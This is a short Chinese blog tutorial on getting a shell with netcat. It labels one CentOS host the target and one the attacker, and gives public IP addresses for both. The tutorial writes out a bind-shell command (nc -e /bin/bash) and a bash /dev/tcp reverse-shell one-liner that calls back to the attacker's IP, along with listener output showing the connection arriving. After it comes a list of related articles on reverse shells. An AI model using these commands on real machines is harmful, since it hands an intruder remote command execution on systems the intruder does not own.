如何使用NC反弹shell

简介: 如何使用NC反弹shell

centos1为目标服务器,我这里是centos的一台测试机器。ip为101.200.41.219

centos2为攻击者机器,ip为8.140.129.23

最终是将centos1的shell反弹到centos2上面。

一、正向反弹shell

在centos1上面执行

[root@wltest ~]# nc -lvp  5555 -e /bin/bash

Ncat: Version 7.70 ( https://nmap.org/ncat )

Ncat: Listening on :::5555

Ncat: Listening on 0.0.0.0:5555


在centos2上面执行

nc  101.200.41.219   5555

然后就可以shell了

二、反向反弹shell

首先在攻击者服务器也就是centos2机器上面执行

[root@iZ2zeckpvpsaii62eyh834Z ~]# nc -lvp  5002

Ncat: Version 7.70 ( https://nmap.org/ncat )

Ncat: Listening on :::5002

Ncat: Listening on 0.0.0.0:5002

Ncat: Connection from 101.200.41.219.

Ncat: Connection from 101.200.41.219:44134.

[root@wltest ~]#


然后在目标机器centos1执行

[root@wltest ~]# bash -i >& /dev/tcp/8.140.129.23/5002  0>&1


在centos2机器上面执行nc -lvp  5002后会处于一个监听的状态,等在centos1上面执行

 bash -i >& /dev/tcp/8.140.129.23/5002  0>&1后,centos上上面就进入了centos的shell了

相关文章
|
4月前
|
监控 网络协议 Unix
Linux命令-nc(端口监控、文件传输、反弹shell等)
Linux命令-nc(端口监控、文件传输、反弹shell等)
112 0
|
安全 NoSQL 关系型数据库
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
今天的内容是ssrf漏洞的利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell,直接看操作
455 0
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
|
NoSQL 安全 网络协议
|
6月前
|
Shell
反弹shell脚本(php-reverse-shell)
反弹shell脚本(php-reverse-shell)
107 0
|
6月前
|
安全 网络协议 Shell
[笔记]Windows安全之《一》反弹Shell
[笔记]Windows安全之《一》反弹Shell
|
网络协议 安全 Shell
[笔记]Windows安全之《一》反弹Shell
Windows安全之《一》反弹Shell
694 0
[笔记]Windows安全之《一》反弹Shell
|
11月前
|
安全 Shell Linux
使用OpenSsl加密反弹shell
当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量
201 0
|
11月前
|
网络协议 Shell 网络安全
利用icmpsh建立icmp隧道反弹shell
利用icmpsh建立icmp隧道反弹shell
89 0
|
11月前
|
Shell 数据库连接 数据库
宝塔后渗透-添加用户|反弹shell
宝塔后渗透-添加用户|反弹shell
254 0
|
网络协议 JavaScript Java
反弹shell备忘录
常用的一些反弹shell命令备忘录
310 0